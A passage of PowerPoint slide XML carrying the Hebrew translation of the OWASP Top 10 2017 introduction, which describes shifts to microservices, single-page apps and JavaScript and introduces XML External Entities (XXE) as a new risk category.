                        <a:t>OWASP Top 10</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>, חידשנו את שיטת העבודה, יצרנו תהליך איסוף מידע חדש, עבדנו בשיתוף עם הקהילה, סידרנו מחדש את הסיכונים שלנו, כתבנו מחדש כל סיכון והוספנו הפניות למסגרות עבודה ושפות נפוצות כיום.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="0" algn="r" rtl="1">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:buNone/>
                      </a:pPr>
                      <a:endParaRPr lang="he-IL" sz="900" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="0" algn="r" rtl="1">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>בשנים האחרונות, היסודות הטכנולוגיים והארכיטקטורה של יישומים השתנו משמעותית:</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="171450" lvl="0" indent="-171450" algn="r" rtl="1">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:buFont typeface="Arial" charset="0"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Microservices</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> הכתובים בשפת </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Node.JS</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> ו-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Spring Boot</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> מחליפים יישומים מונוליטיים (יישומים המורכבים משכבה אחת – שילוב של ממשק משתמש וקוד לגישה). ל-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Microservices</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> יש אתגרי אבטחה ייחודים כגון יצירת אמון בין </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Microservices</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>containers</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>, ניהול סיסמאות ופרטים סודיים ועוד. קוד ישן שמעולם לא תוכנן להיות נגיש לאינטרנט, נמצא כעת מאחורי ממשק פיתוח (</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>API</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>) או שירות </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Web</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>RESTful</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>, ונצרך על ידי יישומים מבוססי עמוד אחד (</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Single Page Applications</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>) ויישומי מובייל. הנחות ארכיטקטוניות שהיו נכונות בזמן כתיבת הקוד, כגון מי מורשה לקרוא לקוד, כבר לא נכונות.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="171450" lvl="0" indent="-171450" algn="r" rtl="1">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:buFont typeface="Arial" charset="0"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>יישומים מבוססי עמוד אחד (</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Single Page Applications</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>), שנכתבו באמצעות ספריות </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>JavaScript</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> כמו </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Anguler</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> או </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>React</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>, מאפשרות ליצור ממשק קצה מודולארי ועשיר ביכולות. יכולות צד לקוח, שבעבר היו נגישות רק מצד השרת, מוסיפות אתגרי אבטחה משלהן.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="171450" lvl="0" indent="-171450" algn="r" rtl="1">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:buFont typeface="Arial" charset="0"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>שפת </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>JavaScript</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> היא כעת השפה העיקרית של האינטרנט, עם </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Node.JS</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> לכתיבת צד שרת, וספריות מודרניות כמו </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Bootstrap, Electron, Angular</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> ו </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="mr-IN" sz="900" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>–</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>React</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> בצד לקוח.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="0" algn="r" rtl="1">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" b="1" i="0" u="none" strike="noStrike" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>בעיות</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" b="1" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> חדשות, שנתמכות ע"י נתונים:</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="171450" lvl="0" indent="-171450" algn="r" rtl="1">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:buFont typeface="Arial" charset="0"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" i="0" u="none" strike="noStrike" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId4" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>A4:2017</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" b="1" i="0" u="none" strike="noStrike" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId4" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>: ישויות </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" i="0" u="none" strike="noStrike" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId4" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>XML</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" b="1" i="0" u="none" strike="noStrike" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId4" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t> חיצוניות – </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" i="0" u="none" strike="noStrike" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId4" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>XML External Entities (XXE)</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> זוהי קטגוריה חדשה הנתמכת בעיקר ע"י </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId5"/>
                        </a:rPr>
                        <a:t>כלי ניתוח קוד סטאטי (</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId5"/>
                        </a:rPr>
                        <a:t>SAST</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId5"/>
                        </a:rPr>
                        <a:t>)</a:t>
                      </a:r>
                      <a:endParaRPr lang="he-IL" sz="900" b="1" i="0" u="none" strike="noStrike" noProof="0" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:hlinkClick r:id="rId4" action="ppaction://hlinksldjump"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="r" rtl="1">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:buFont typeface="Arial" charset="0"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" b="1" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>בעיות חדשות שנתמכות ע"י הקהילה:</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="r" rtl="1">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:buFont typeface="Arial" charset="0"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
